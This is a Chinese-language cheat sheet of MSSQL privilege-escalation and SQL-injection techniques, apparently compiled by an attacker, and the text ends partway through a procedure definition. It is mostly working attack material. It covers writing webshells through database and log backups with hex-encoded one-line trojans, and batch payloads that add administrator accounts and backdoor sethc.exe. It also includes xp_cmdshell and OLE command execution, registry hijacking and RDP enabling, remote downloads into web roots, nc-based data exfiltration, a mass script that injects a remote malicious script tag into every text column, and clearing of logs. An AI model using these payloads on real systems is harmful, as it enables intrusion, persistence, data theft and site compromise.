收集的一些 MSSQL提权 常用命令及提权技巧
-得到硬盘文件信息
--参数说明:目录名,目录深度,是否显示文件
execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1
-------------------------------
db取系统权限5步之hta
-------------------------------
declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x636E36353636 backup database @a to disk=@s--
Drop table [cn911];create table [dbo].[cn911] ([cmd] [image])--
insert into cn911(cmd) values (0x3C3F706870206576616C28245F504F53545B61685D293B3F3E)--
declare @a sysname,@s varchar(4000) select @a=db_name (),@s=0x443A5C686F7374696E675C777777726F6F745C753467616D655F636F6D5C6874646F63735C696D6167655C782E706870 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
Drop table [cn911]--
-------------------------------
db取系统权限6步之bat
-------------------------------
alter database [test] set RECOVERY FULL--
create table cmd (a image)--
backup log [test] to disk = 'c:\windows\temp\cmd1' with init--
insert into cmd (a) values (0x406563686F206F66660D0A406563686F206F66660D0A40636D642E657865202F63206563686F2065786563206D61737465722E64626F2E73705F6164646C6F67696E20276A61636B272C276A61636B27203E746573742E7172790D0A40636D642E657865202F63206563686F2065786563206D61737465722E64626F2E73705F6164646C6F67696E20276A61636B272C276A61636B27203E746573742E7172790D0A40636D642E657865202F63206563686F20657865632073705F616464737276726F6C656D656D62657220276A61636B272C2773797361646D696E27203E3E746573742E7172790D0A40636D642E657865202F63206563686F20657865632073705F616464737276726F6C656D656D62657220276A61636B272C2773797361646D696E27203E3E746573742E7172790D0A40636D642E657865202F63206973716C202D45202F5520616C6D61202F50202F6920633A5C746573742E7172790D0A40636D642E657865202F63206973716C202D45202F5520616C6D61202F50202F6920633A5C746573742E7172790D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572206675636B796F756D616D610D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572206675636B796F756D616D610D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572202F6163746976653A7965730D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572202F6163746976653A7965730D0A40636D642E657865202F63206E657431206C6F63616C67726F75702061646D696E6973747261746F72732073716C6465627567676572202F6164640D0A40636D642E657865202F63206E657431206C6F63616C67726F75702061646D696E6973747261746F72732073716C6465627567676572202F6164640D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C73686966742E7662730D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C73686966742E7662730D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C686173682E7662730D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C686173682E7662730D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672065766572796F6E653A660D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672065766572796F6E653A660D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672061646D696E6973747261746F72733A660D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672061646D696E6973747261746F72733A660D0A40636D642E657865202F6320636F707920633A5C77696E646F77735C73797374656D33325C7461736B6D67722E65786520633A5C77696E646F77735C73797374656D33325C73657468632E657865202F790D0A40636D642E657865202F6320636F707920633A5C77696E646F77735C73797374656D33325C7461736B6D67722E65786520633A5C77696E646F77735C73797374656D33325C73657468632E657865202F790D0A40636D642E657865202F632064656C202530250D0A40636D642E657865202F632064656C202530250D0A400D0A40)--
backup log [test] to disk = 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\x.bat'--
drop table cmd--
@echo off
@echo off
@cmd.exe /c echo exec master.dbo.sp_addlogin 'jack','jack' >test.qry
@cmd.exe /c echo exec master.dbo.sp_addlogin 'jack','jack' >test.qry
@cmd.exe /c echo exec sp_addsrvrolemember 'jack','sysadmin' >>test.qry
@cmd.exe /c echo exec sp_addsrvrolemember 'jack','sysadmin' >>test.qry
@cmd.exe /c isql -E /U alma /P /i c:\test.qry
@cmd.exe /c isql -E /U alma /P /i c:\test.qry
@cmd.exe /c net1 user sqldebugger daoke
@cmd.exe /c net1 user sqldebugger daoke
@cmd.exe /c net1 user sqldebugger /active:yes
@cmd.exe /c net1 user sqldebugger /active:yes
@cmd.exe /c net1 localgroup administrators sqldebugger /add
@cmd.exe /c net1 localgroup administrators sqldebugger /add
@cmd.exe /c cscript c:\windows\temp\shift.vbs
@cmd.exe /c cscript c:\windows\temp\shift.vbs
@cmd.exe /c cscript c:\windows\temp\hash.vbs
@cmd.exe /c cscript c:\windows\temp\hash.vbs
@cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g everyone:f
@cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g everyone:f
@cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g administrators:f
@cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g administrators:f
@cmd.exe /c copy c:\windows\system32\taskmgr.exe c:\windows\system32\sethc.exe /y
@cmd.exe /c copy c:\windows\system32\taskmgr.exe c:\windows\system32\sethc.exe /y
@cmd.exe /c del %0%
@cmd.exe /c del %0%
@
@
-------------------------------
sa取系统权限之sp_makewebtask
-------------------------------
sp_makewebtask 'c:\1.hta',' select ''<script language=VBScript>
On Error Resume Next
set wshshell=createobject("wscript.shell")
a=wshshell.run ("command.com /c net1 user jack jackjack123!@# /add",0)
</script>'' ';--
------------------------------
xp_lake2 提权
------------------------------
执行命令
exec xp_lake2 'ipconfig'
添加存储过程
sp_addextendedproc xp_cmdshell,@dllname='E:\InetPub\wwwRoot\uploadfile\xp_lake2.dll'
sp_addextendedproc 'xp_lake2', 'E:\InetPub\wwwRoot\uploadfile\xp_lake2.dll'
删除存储过程
sp_dropxtendedproc xp_lake2
------------------------------
xp_cmdshell 提权
------------------------------
执行命令
exec master.dbo.xp_cmdshell 'cmd /c ipconfig'
开启cmdshell的SQL语句
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
xp_cmdshell新的恢复办法 (效果很好)
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec master.dbo.sp_dropextendedproc 'xp_cmdshell'
恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
手工xp_cmdshell新的恢复办法
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec master.dbo.sp_dropextendedproc 'xp_cmdshell'
恢复
;use master;dbcc addextendedproc ("sp_oacreate","odsole70.dll")
;use master;dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
-----
;exec/**/master..sp_addextendedproc/**/[xp_cmdshell],[xplog70.dll]--
;use/**/master/**/dbcc/**/addextendedproc([xp_cmdshell],[xplog70.dll])--
;use/**/master/**/dbcc/**/addextendedproc([sp_OACreate],[odsole70.dll])--
恢复xp_cmdshell
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK
否则上传xplog70.dll
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','F:\xx.com\xplog70.dll'
常见情况恢复执行xp_cmdshell.
1 未能找到存储过程'master..xpcmdshell'.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:EXEC sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_dropextendedproc "xp_cmdshell"
第二步执行:EXEC sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然后按F5键命令执行完毕
4 SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
然后按F5键命令执行完毕
mssql2005
启用xp_cmdshell
USE master
EXEC sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'show advanced options', 0
RECONFIGURE WITH OVERRIDE
--关闭xp_cmdshell
USE master
EXEC sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'xp_cmdshell', 0
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'show advanced options', 0
RECONFIGURE WITH OVERRIDE
--------------------------------------
只要ws没删 用下面这个语句百试不爽
declare [url=https://www.t00ls.net/space-uid-3295.html]@shell[/url] int exec sp_oacreate 'wscript.shell',[url=https://www.t00ls.net/space-uid-3295.html]@shell[/url] output exec sp_oamethod [url=https://www.t00ls.net/space-uid-3295.html]@shell[/url],'run',null,'c:\windows\system32\cmd.exe /c ipconfig'
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run], NULL, [d:\cmd.exe /c dir c:\] --
--------------------------------------
--------------------------------------
sa(shift取系统权限)
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\taskmgr.exe' ,'c:\windows\system32\sethc.exe';
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\taskmgr.exe' ,'c:\windows\system32\dllcache\sethc.exe';
--------------------------------------
在WEBSHELL里转了半天还是没什么收获,感觉还是得靠那个SA来提权,于是笔者问了下朋友,他说你怎么忘了沙盒模式?
看来最近脑子晕了于是在查询分析器里执行:
意思是修改注册表,开启沙盒:
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD','0'
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
0 禁止一切(默认)
1 使能访问ACCESS,但是禁止其它
2 禁止访问ACCESS,但是使能其他
3 使能一切
通过沙盒添加用户
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c ipconfig")');
添加系统帐户(重启后生效DB权限就可以执行)
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','jack','REG_SZ','ipconfig'
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','jack1','REG_SZ','net localgroup administrators jack /add'
映像劫持
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\currentversion\Image File Execution Options\sethc.exe','debugger','REG_SZ','c:\windows\system32\taskmgr.exe'
--------------------
sa radmin提权
--------------------
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c
即可修改密码为12345678。如果要修改端口值
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
删除添加储存过程
drop procedure sp_addlogin
add procedure sp_addlogin
恢复存储过程
于是马上想到恢复存储过程来执行命令,于是在查询分析器里执行:
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
exec sp_addextendedproc sp_makewebtask,'xpweb70.dll'
恢复sp_addextendedproc,语句如下:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
读取配置文件信息
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
写进su配置文件提权
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
查看终端
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
SQL语句下载
DECLARE
@B varbinary(8000),
@hr int,
@http INT,
@down INT
EXEC sp_oacreate [Microsoft.XMLHTTP],@http output
EXEC @hr = sp_oamethod @http,[Open],null,[GET],[[url]http://xxx.org/jsp.zip[/url]],0
EXEC @hr = sp_oamethod @http,[Send],null
EXEC @hr=sp_OAGetProperty @http,[responseBody],@B output
EXEC @hr=sp_oacreate [ADODB.Stream],@down output
EXEC @hr=sp_OASetProperty @down,[Type],1
EXEC @hr=sp_OASetProperty @down,[mode],3
EXEC @hr=sp_oamethod @down,[Open],null
EXEC @hr=sp_oamethod @down,[Write],null,@B
EXEC @hr=sp_oamethod @down,[SaveToFile],null,[d:\java\Tomcat 5.5\webapps\XXXX\1.jsp],1 ;--
web注入
字符型需要在浏览器输入' 如id=xx';
数字型则不需要 如id=xx;
sa直接写一句话
sp_makewebtask 'e:\gygov.com\xx.asp',' select ''<%execute request("ah")%>'' ';--
-------------------------------------------------------------------
sql备份
日志备分WEBSHELL标准的七步:
1.InjectionURL';alter database mm_db set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)
2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表)
3.InjectionURL';backup log mm_db to disk = 'c:\cmd' with init-- (减少备分数据的大小)
4.InjectionURL';insert into cmd (a) values ('<%%25eval(request("a")):response.end%%25>')-- (插入一句话木马)
5.InjectionURL';backup log mm_db to disk = 'd:\chinakm\test.asp'-- (备分日志到WEB路径)
6.InjectionURL';drop table cmd-- (删除新建的cmd表)
7.InjectionURL';alter database mm_db set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)
数据库差异备份代码:
1、create table [dbo].[jm_tmp] ([cmd] [image])-- 创建一个表
2、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X6A006D00640063007700 backup database @a to disk = @s --备份数据库,@s为备份名称(jmdcw的16进制转换)
3、insert into [jm_tmp](cmd) values(0x3C2565786563757465287265717565737428226C222929253E)--将一句话木马 "<%execute(request("l"))%>"的16进制字符插入到表中
4、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='C:\xx.asp' backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT --对数据库实行差异备份,备份的保存路径暂定为C盘目录,文件名为xx.asp。
5、drop table [jm_tmp]-- 删除此表。
Mssql2005 Log备份Webshell 9步
;alter/**/database/**/[ikoreadb]/**/set/**/recovery/**/full--
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init--
;drop/**/table/**/[JCZ3Tmp]--
;create/**/table/**/[JCZ3Tmp]([a]/**/image)--
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init--
;insert/**/into/**/[JCZ3Tmp]([a])/**/values(0x3C2545786563757465287265717565737428226168222929253E)--
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x64003A005C0069006B006F007200650061007700650062005C007500730065007200660069006C00650073005C00660069006C0065005C007300730073002E00610073007000/**/backup/**/log/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init--
;drop/**/table/**/[JCZ3Tmp]--
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init--
-----------------------------------------------------------------------
-获得MS SQL的版本号
execute master..sp_msgetversion
获取当前库服务器机器名
Select host_name()
-------------------------------------
创建个登陆mssql的帐号
-------------------------------------
exec master.dbo.sp_addlogin jack,jack;--
加mssql帐户为jack
exec master.dbo.sp_addsrvrolemember satan,sysadmin;--
把创建的mssql登陆帐号jack提升到sysadmin
我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!
--列出服务器上所有windows本地组
execute master..xp_enumgroups //dbo
--显示系统上可用的盘符
execute master..xp_availablemedia //dbo
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
数字类型
and char(124)%2Buser%2Bchar(124)=0
字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
爆用户名
and user>0
' and user>0 and ''='
检测是否为SA权限
or convert(int, system_user)=1--
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
检测是不是MSSQL数据库
and exists (select * from sysobjects);--
检测是否支持多行
;declare @d int;--
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
停掉或激活某个服务。
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
xp_terminate_process
停掉某个执行中的程序,但赋予的参数是 Process ID。
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
xp_terminate_process 2484
xp_unpackcab
解开压缩档。
xp_unpackcab 'c:\test.cab','c:\temp',1
更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'
-----------------------------
cmd加sql帐户
-----------------------------
echo exec master.dbo.sp_addlogin 'jack','jack' >test.qry
echo exec sp_addsrvrolemember 'jack','sysadmin' >>test.qry
cmd.exe /c isql -E /U alma /P /i c:\test.qry
mssql更新及查询语句
select * from db_name where tablename='x140m1n6'
从db_name表中寻找出tablename是 x140m1n6的信息数据
UPDATE db_name SET monery = '10.00' WHERE UserName = 'x140m1n6'
修改数据库db_name,设置Username为x140m1n6的money项为10.
查询
select * from dnt_users where uid=577
插马
;update+表名+set+字段名=插马地址+where+id=(要插马的id)--
例子
http://www.xxx.com/xxx.asp?id=2122;update+law+set+title=0xC3BFC8D5BEADBCC3D0C2CEC5A3BAB0D9CBBCC2F2B7C5BBBAD6D0B9FACDD8D5B9BDC5B2BD0D0A+where+id=1115--
sql2005存储添加
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
------------------------------------------
sql开 3389
'exec master..xp_regwrite @r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';----
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'software\microsoft\windows nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';----
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;----
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'system\currentcontrolset\control\terminal server','Tsenabled','reg_dword',1;----
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'system\currentcontrolset\services\termdd','start','reg_dword',2;----
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite @r,'system\currentcontrolset\services\termservice','start','reg_dword',2;----
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_regwrite 'hkey_users','.default\keyboard layout\toggle','hotkey','reg_sz','1';----
;declare @r varchar(255) set @r='HKEY_LOCAL_MACHINE'exec master..xp_cmdshell 'iisreset /reboot';----
-------------------------------------------
在db权限并且分离获取mssql数据库服务器ip的方法
1.本地nc监听 nc -vvlp 80
2.;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;', 'select * from dest_table') select * from src_table;--
其他的都不用管
去掉tenlnet的ntlm认证
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'—
public权限列目录
提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧
--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表
create table ##nonamed(
dir ntext,
num int
)
--调用存储过程把执行回来的数据存到临时表里面
insert ##nonamed execute master..xp_dirtree 'c:\',1
--然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了
insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')
select * from ##nonamed
以上方法,也就是说public可以遍历用户服务器的目录
dtproperties这个表默认是public可写的,提示够清楚了吧
手工列目录语句
';DROP TABLE D99_Tmp;CREATE TABLE D99_Tmp(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) Insert D99_Tmp exec master..xp_dirtree "C:\", 1,1--
' And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 and ''='
2005恢复 xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
2005恢复 sp_oacreate
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
清理掉SQL日志
set nocount on
declare @logicalfilename sysname,
@maxminutes int,
@newsize int
mssql清除日志
DUMP TRANSACTION 数据库名 WITH NO_LOG
对mssql事务日志变大的处理 清空日志
DUMP TRANSACTION 数据库名 WITH NO_LOG
截断事务日志
BACKUP LOG 数据库名 WITH NO_LOG
收缩数据库
DBCC SHRINKDATABASE(数据库名)
mssql导出数据库表
本机
exec master..xp_cmdshell 'bcp ikoreaDB..member out d:\tt.xls -c -t, -T'
远程
exec master..xp_cmdshell 'bcp Databse..table out d:\tt.txt -c -t , -Sservername -Uuser -Ppassword'
servername为sqlserver的名字
user为id
password 为密码
映像劫持ii
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\Currentversion\Image File Execution Options\osk.exe','debugger','REG_sz','g:\web\rootsite\djsite\uploadfile\nt.exe on';--
SQL开3389命令2007-05-19 12:22把一次从SQL开3389的记录过程发出来,望对新手有用
注://为注释
实例过程:
连接到主机:
xxx.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机
命令:
xp_cmdshell "type c:\boot.ini" // 输入命令,看系统,server版的才能 开3389
执行成功,
结果:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
命令:
xp_cmdshell "echo [Components] > c:\hack" //在c盘根目录建写入一个文件,文件名hack大家可以自己改为自己的
执行成功,
命令:
xp_cmdshell "echo TsEnable = on >> c:\hack" //追加写入
执行成功,
结果:
命令:
xp_cmdshell "type c:\hack" //看看hack里的内容是否正确
执行成功,
结果:
[Components]
TsEnable = on
TsEnable = on
命令:
xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\hack /q" //开3389,成功的话过会肉机会重启!!
执行成功,
结果:
GetLocalManagedApplications returned (2)
数据库挂马
针对ASP+mssql攻击测试代码:
declare @t varchar(255),
@c varchar(255)
declare table_cursor cursor for
select a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
open table_cursor
fetch next from table_cursor into @t,@c
while(@@fetch_status=0)
begin
exec('update ['+@t+'] set ['+@c+']=
rtrim(convert(varchar,['+@c+']))+cast(0x223E3C2F613E3C2F7469746C653E3C736372697074206C616E67756167653D6A617661736372697074207372633D687474703A2F2F2533352533312536462536362532452536452536352537342F696D672E6769663E3C2F7363726970743E as varchar(80))')
fetch next from table_cursor into @t,@c
end
close table_cursor
deallocate table_cursor
"></a></title><script language=javascript src=http://%35%31%6F%66%2E%6E%65%74/img.gif></script>
;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F613E3C2F7469746C653E3C696672616D65207372633D687474703A2F2F7777772E676F6F676C652E636F6D2077696474683D313030206865696768743D3130303E3C2F696672616D653E20%20aS%20vArChAr(80))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;--
创建sp_makewebtask这个存储过程
/********************************************************************************************/
/* Create SP's */
/********************************************************************************************/
--====================================================================================
-- Add extended stored procedures for Web Server support.
--
-- sp_makewebtask: Creates and defines the Web Page Task
CREATE PROCEDURE sys.sp_makewebtask
@outputfile nvarchar(255),
@query ntext,
@fixedfont tinyint = 1, -- 0/1
@bold tinyint = 0, -- 0/1
@italic tinyint = 0, -- 0/1
@colheaders tinyint = 1, -- 0/1
@lastupdated tinyint = 1, -- 0/1
@HTMLheader tinyint = 1, -- 1-6
@username nvarchar(128) = NULL,
@dbname nvarchar(128) = NULL,
@templatefile nvarchar(255) = NULL,
@webpagetitle nvarchar(255) = NULL,
@resultstitle nvarchar(255) = NULL,
@URL nvarchar(255) = NULL,
@reftext nvarchar(255) = NULL,
@table_urls tinyint = 0, -- 0/1; 1=use table of URLs
@url_query nvarchar(255) = NULL,
@whentype tinyint = 1, -- 1=now, 2=later, 3=every xday
-- 4=every n units of time
@targetdate int = 0, -- yyyymmdd as int
@targettime int = 0, -- hhnnss as int
@dayflags tinyint = 1, -- powers of 2 for days of week
@numunits tinyint = 1,
@unittype tinyint = 1, -- 1=hours, 2=days, 3=weeks, 4=minutes
